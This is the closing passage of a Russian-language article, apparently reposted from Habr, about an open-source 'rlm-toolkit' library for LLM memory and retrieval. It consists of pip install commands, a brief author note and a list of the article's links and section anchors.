pip install rlm-toolkit
# С полным набором интеграций
pip install rlm-toolkit[all]
Вопросы? Пишите в комментариях или открывайте issues на GitHub!
Об авторе: Разработчик SENTINEL AI Security Platform — open-source решения для защиты LLM-приложений.
Автор: Dmitriila
Источник [18]
Сайт-источник BrainTools: https://www.braintools.ru
Путь до страницы источника: https://www.braintools.ru/article/24430
URLs in this post:
[1] математика: http://www.braintools.ru/article/7620
[2] памяти: http://www.braintools.ru/article/4140
[3] Проблема: Context Rot — математика деградации: #problem
[4] Теория: формальное определение RLM: #theory
[5] InfiniRetri: архитектура и алгоритмы: #infiniretri
[6] RAG vs KAG vs GraphRAG vs InfiniRetri: #comparison
[7] H-MEM: когнитивная иерархическая память: #hmem
[8] Self-Evolving: R-Zero и REBASE: #selfevolving
[9] Security Suite: CIRCLE compliance: #security
[10] Провайдеры: сравнительный анализ: #providers
[11] Практика: полные примеры с логами: #practice
[12] Troubleshooting: #troubleshooting
[13] Заключение и arXiv ссылки: #conclusion
[14] внимание: http://www.braintools.ru/article/7595
[15] pypi.org/project/rlm-toolkit: https://pypi.org/project/rlm-toolkit/
[16] github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit: https://github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
[17] docs: https://github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit/docs
[18] Источник: https://habr.com/ru/articles/986280/?utm_source=habrahabr&utm_medium=rss&utm_campaign=986280
Нажмите здесь для печати.